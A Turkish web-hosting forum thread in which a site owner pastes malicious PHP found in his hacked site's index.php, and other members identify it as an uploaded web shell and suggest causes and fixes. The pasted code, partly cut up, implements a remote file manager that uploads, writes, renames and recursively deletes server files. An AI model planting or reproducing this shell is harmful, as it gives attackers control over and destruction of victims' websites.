Sitenin Hacklenme İhtimali Varmı Bu Nedir ?

Question

Sitenin belli başlı dosyaları silinmiş şöyle bir dosya oluşmuş index'te index.php içi bu şekilde olmuş ayrıca sitenin bir çok yerine bu kod entegre edilmiş 0)array_pop($normalized); continue; } $normalized[]=$part; } $result='/'.implode('/',$normalized); $real=@realpath($result); if($real)return $real; if(@is_dir($result))return rtrim($result,'/'); $parent=dirname($result); if(@is_dir($parent))return $parent; return getcwd(); } function reaka($path){ $handle=@fopen($path,'rb'); if(!$handle)return ''; $content=''; while(!feof($handle)){ $content.=fread($handle,8192); } fclose($handle); return $content; } function wrika($path,$data){ $handle=@fopen($path,'wb'); if(!$handle)return false; fwrite($handle,$data); fclose($handle); return true; } function wipka($dir){ if(!is_dir($dir))return; $items=scandir($dir); foreach($items as $i){ if($i==='.')continue; if($i==='..')continue; $path=$dir.DIRECTORY_SEPARATOR.$i; if(is_dir($path)){ wipka($path); }else{ @unlink($path); } } @rmdir($dir); } $herka=$lockka?fixka(getka($lockka)??getcwd()):getcwd(); if(!$herka or !is_dir($herka))$herka=getcwd(); if($_SERVER['REQUEST_METHOD']==='POST'){ $doka=$_POST['doka']??''; if($doka==='senda'){ if(isset($_FILES['bloka'])){ $tmp=$_FILES['bloka']['tmp_name']; $namka=basename($_FILES['bloka']['name']); if(is_uploaded_file($tmp)){ move_uploaded_file($tmp,$herka.DIRECTORY_SEPARATOR.$namka); jumpka($herka,'u'); } } } if($doka==='wrapa'){ $namka=basename($_POST['titka']??''); $textka=$_POST['bodka']??''; if($namka){ wrika($herka.DIRECTORY_SEPARATOR.$namka,$textka); jumpka($herka,'c'); } } if($doka==='makka'){ $namka=basename($_POST['titka']??''); if($namka){ @mkdir($herka.DIRECTORY_SEPARATOR.$namka,0755); jumpka($herka,'d'); } } if($doka==='modka'){ $filka=$herka.DIRECTORY_SEPARATOR.basename($_POST['whoka']??''); $textka=$_POST['bodka']??''; if(is_file($filka)){ wrika($filka,$textka); jumpka($herka,'s'); }else{ jumpka($herka,'e'); } } if($doka==='shiftka'){ $oldka=$herka.DIRECTORY_SEPARATOR.basename($_POST['fromka']??''); $newka=$herka.DIRECTORY_SEPARATOR.basename($_POST['intoka']??''); if(file_exists($oldka)){ @rename($oldka,$newka); jumpka($herka,'r'); }else{ jumpka($herka,'e'); } } if($doka==='killka'){ $thingka=$herka.DIRECTORY_SEPARATOR.basename($_POST['whoka']??''); if(is_file($thingka)){ @unlink($thingka); jumpka($herka,'x'); }elseif(is_dir($thingka)){ wipka($thingka); jumpka($herka,'x'); }else{ jumpka($herka,'e'); } } } $msgka=['u'=>'Sendar komplet','c'=>'Dokka kreated','d'=>'Foldar builded','s'=>'Changez saved','r'=>'Namez shifted','x'=>'Itemka wiped','e'=>'Operationz failed']; $blimka=$blikka?($msgka[$blikka]??''):''; $editka=$_GET['opka']??''; ?> Filer

Kanelka

Lama:
ROOT'; $buildka=''; foreach($segka as $part){ $buildka.='/'.$part; $hash=mixar($buildka); putka($hash,$buildka); echo ' / '.htmlspecialchars($part).''; } ?>

Sendar Dokka

Kreatar Dokka

Buildar Foldar

Modifar:

Namka

Sizka

Modka

Timka

Aktionz

'; echo '

'; if($isdirka){ $nexthash=mixar($fullka); putka($nexthash,$fullka); echo '[DIR] '.htmlspecialchars($itka).''; }else{ echo '[FILE] '.htmlspecialchars($itka); } echo '

'; echo '

'.$sizka.'

'; echo '

'.$perka.'

'; echo '

'.$timka.'

'; echo '

'; if(!$isdirka){ $curhash=mixar($herka); putka($curhash,$herka); echo ''; } echo ''; echo ''; echo '

'; } } ?>

aksoyhlc · Answer

Direkt hacklenmiş, geçmiş olsun.

Roadhog · Answer

aksoyhlc adlı üyeden alıntı:						mesajı görüntüle									Direkt hacklenmiş, geçmiş olsun. 		Bizdeki şansta bu olurdu zaten site daha yeni bitmişti 2 3 haftaya müşteri çekmeye başlicaktım nasıl olabilir böyle birşey

Barthesan · Answer

İhtimal yok. Kesinlikle hacklenmiş. Alttaki görsel PHP Obfuscation tekniği. Zararlı kodları gizlemeye çalışmış. Hex değişkeninin içindeki kodu hex to text aracına atın çıkan kod saldırganın kullandığı koddur.

Adwops · Answer

Bu genelde ***** tema kullanımından kaynaklanıyor. Ya da demoyu kurduğun hostingde olan bir virüs sıçramış olabilir.

Roadhog · Answer

***** değil hocam para verip alıp codecanyondan temasınıda aynı şekilde

aksoyhlc · Answer

Roadhog adlı üyeden alıntı:						mesajı görüntüle									Bizdeki şansta bu olurdu zaten site daha yeni bitmişti 2 3 haftaya müşteri çekmeye başlicaktım nasıl olabilir böyle birşey 		Shell dosyası yüklenmiş sonra dosyalar silinip değiştirilmiş, dosya yükleme formlarınıza dikkat edin, dosya tipini kontrol edin sadece uzantı değil, görsel gibi gözüküyor ama exif içerisine php kodları ekleniyor o yüzden mümkünse sizde dosyaları dönüştürüp öyle kaydedin exif datalarını silin sunucunuza öyle kaydedin.

YuzarifD · Answer

şu an genel olarak crackli eklenti ve temalarda virüs bulunuyor bu yüzden olmuş olma ihtimali yüksek

Roadhog · Answer

Adwops adlı üyeden alıntı:						mesajı görüntüle									Bu genelde ***** tema kullanımından kaynaklanıyor. Ya da demoyu kurduğun hostingde olan bir virüs sıçramış olabilir. 								YuzarifD adlı üyeden alıntı:						mesajı görüntüle									şu an genel olarak crackli eklenti ve temalarda virüs bulunuyor bu yüzden olmuş olma ihtimali yüksek 		Yok orjinal lisans hocam direk codeden almıştım 2 3 aydır boştaydı site işleri bitirdik bi baktık patlamış

S3K1Z · Answer

Wordpress mi sisteminiz ? içine obfuscated kod basılmış genelde wordpress sitelerinde eklentilerdeki açıklardan kaynaklı olur.

erknabd · Answer

Hocam siber güvnlik hizmeti arayışınız varsa nerden girmiş ne yapmış nasıl çıkartırız yardımcı olabilirim

YuzarifD · Answer

Roadhog adlı üyeden alıntı:						mesajı görüntüle									Yok orjinal lisans hocam direk codeden almıştım 2 3 aydır boştaydı site işleri bitirdik bi baktık patlamış 		
o zaman ilgili temanın açığını bulmuşlardır diye tahmin ediyorum hocam bi yerinden girmişleri belliki...

Roadhog · Answer

S3K1Z adlı üyeden alıntı:						mesajı görüntüle									Wordpress mi sisteminiz ? içine obfuscated kod basılmış genelde wordpress sitelerinde eklentilerdeki açıklardan kaynaklı olur. 								erknabd adlı üyeden alıntı:						mesajı görüntüle									Hocam siber güvnlik hizmeti arayışınız varsa nerden girmiş ne yapmış nasıl çıkartırız yardımcı olabilirim 								YuzarifD adlı üyeden alıntı:						mesajı görüntüle									o zaman ilgili temanın açığını bulmuşlardır diye tahmin ediyorum hocam bi yerinden girmişleri belliki... 		Wordpress değil  hazır php dün bütün işi bitmişti bugün olana bak

YuzarifD · Answer

Roadhog adlı üyeden alıntı:						mesajı görüntüle									Wordpress değil hazır php dün bütün işi bitmişti bugün olana bak 		
PHP ise kesin açık bulmuşlardır hocam sağlayıcı ile iletişime geçmenizde fayda var

RakipsizHizmet · Answer

Alt yapı nedir?
https://www.r10.net/wordpress-seo-gu...emium-waf.html

EvrenHost · Answer

Herkesin atladığı bir şeyi söyleyeceğim, bu zararlı kodu site dosyalarınıza ekleyen bilgisayarınız da olabilir.

Bilgisayarınızdaki zararlı yazılım FTP bağlantısı yaptığınızda daha fazla yayılmak için bunu otomatik olarak yapabilir.

FTP şifrenizi değiştirip bilgisayarınızıda kontrol edin.